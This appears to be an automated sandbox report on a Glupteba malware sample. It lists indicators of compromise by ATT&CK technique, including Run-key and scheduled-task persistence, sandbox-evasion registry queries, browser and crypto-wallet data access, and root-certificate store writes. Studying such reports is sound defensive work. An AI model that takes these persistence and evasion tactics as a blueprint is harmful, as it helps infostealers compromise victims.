glupteba | baa381f572d293636b6e48cacd2cd6a6f4f9e5f71c583873260f6ac01f0f5e15

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1018857.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1018857.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5lf4wMbH4mC3Lxf2JAoQ37rC.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5lf4wMbH4mC3Lxf2JAoQ37rC.exe

Loads dropped DLL 15 IoCs

pid	Process
4152	setup_install.exe
4152	setup_install.exe
4152	setup_install.exe
4152	setup_install.exe
4152	setup_install.exe
4152	setup_install.exe
1124	Fri157e25afd971.tmp
4648	rundll32.exe
3832	setup_2.tmp
5536	setup_2.tmp
5792	rundll32.exe
4356	installer.exe
4356	installer.exe
4356	installer.exe
6028	N7ZrGHP20fmHvuKzPAPhMF87.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral5/files/0x000200000002b1e7-304.dat	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	5554559.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\UltraMediaBurner\\Sirovidebi.exe\""	zab2our.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1018857.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	5lf4wMbH4mC3Lxf2JAoQ37rC.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\F:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com
4	ipinfo.io
91	ipinfo.io
177	ipinfo.io
222	ipinfo.io
2	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4452	1018857.exe
6052	5lf4wMbH4mC3Lxf2JAoQ37rC.exe

Drops file in Program Files directory 12 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-HVMO0.tmp	setup_2.tmp
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files\Windows Photo Viewer\KMHPCXRQCF\ultramediaburner.exe	zab2our.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-BULK2.tmp	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files\Windows Photo Viewer\KMHPCXRQCF\ultramediaburner.exe.config	zab2our.exe
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-U7IQ2.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\Sirovidebi.exe	zab2our.exe
File created	C:\Program Files (x86)\UltraMediaBurner\Sirovidebi.exe.config	zab2our.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 56 IoCs

pid	pid_target	Process	procid_target
2416	2340	WerFault.exe	95
2472	4188	WerFault.exe	97
2384	4648	WerFault.exe	113
2904	4916	WerFault.exe	118
5128	4540	WerFault.exe	120
5664	1164	WerFault.exe	116
5824	5792	WerFault.exe	150
5196	3800	WerFault.exe	108
344	5524	WerFault.exe	142
1692	5268	WerFault.exe	134
1212	1732	WerFault.exe	148
5968	5972	WerFault.exe	174
5088	5672	WerFault.exe	209
5968	3088	WerFault.exe	208
5052	2976	WerFault.exe	197
5024	3176	WerFault.exe	202
5416	1368	WerFault.exe	224
6184	1080	WerFault.exe	257
6792	1636	WerFault.exe	260
5868	5520	WerFault.exe	241
2056	2340	WerFault.exe	237
7164	5288	WerFault.exe	243
6652	6052	WerFault.exe	252
5860	1860	WerFault.exe	251
7840	7376	WerFault.exe	358
5628	5216	WerFault.exe	304
5192	6976	WerFault.exe	289
9668	6680	WerFault.exe	310
9876	5492	WerFault.exe	374
2796	5632	WerFault.exe	321
11328	10332	WerFault.exe	455
12284	3804	WerFault.exe	466
12028	7128	WerFault.exe	324
13908	9156	WerFault.exe	535
1544	4860	WerFault.exe	558
14976	14652	WerFault.exe	575
17080	2992	WerFault.exe	627
3060	17540	WerFault.exe	661
1732	19028	WerFault.exe	665
20624	17084	WerFault.exe	713
20716	21032	WerFault.exe	727
22788	1448	WerFault.exe	753
23424	23548	WerFault.exe	762
10124	25492	WerFault.exe	819
9464	10744	WerFault.exe	850
26656	8268	WerFault.exe	396
24100	7280	WerFault.exe	406
14980	20688	WerFault.exe	919
25468	22212	WerFault.exe	928
16204	25248	WerFault.exe	932
16068	25896	WerFault.exe	999
31696	30200	WerFault.exe	1023
23144	15188	WerFault.exe	1022
27236	33584	WerFault.exe	1062
25984	31260	WerFault.exe	1069
36660	6596	WerFault.exe	278

Checks processor information in registry 2 TTPs 64 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	rundll32.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	N7ZrGHP20fmHvuKzPAPhMF87.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	N7ZrGHP20fmHvuKzPAPhMF87.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	sNOldKfrjNE4mmfOTLZWB4RK.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	N7ZrGHP20fmHvuKzPAPhMF87.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	sNOldKfrjNE4mmfOTLZWB4RK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	N7ZrGHP20fmHvuKzPAPhMF87.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	sNOldKfrjNE4mmfOTLZWB4RK.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	N7ZrGHP20fmHvuKzPAPhMF87.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	N7ZrGHP20fmHvuKzPAPhMF87.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	N7ZrGHP20fmHvuKzPAPhMF87.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
6020	schtasks.exe
6824	schtasks.exe
1180	schtasks.exe
6500	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
6308	timeout.exe
12092	timeout.exe

Enumerates system info in registry 2 TTPs 24 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	rundll32.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	N7ZrGHP20fmHvuKzPAPhMF87.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	N7ZrGHP20fmHvuKzPAPhMF87.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	sNOldKfrjNE4mmfOTLZWB4RK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	sNOldKfrjNE4mmfOTLZWB4RK.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	rundll32.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
1656	taskkill.exe
6084	taskkill.exe
11204	taskkill.exe

Modifies data under HKEY_USERS 40 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	sihclient.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c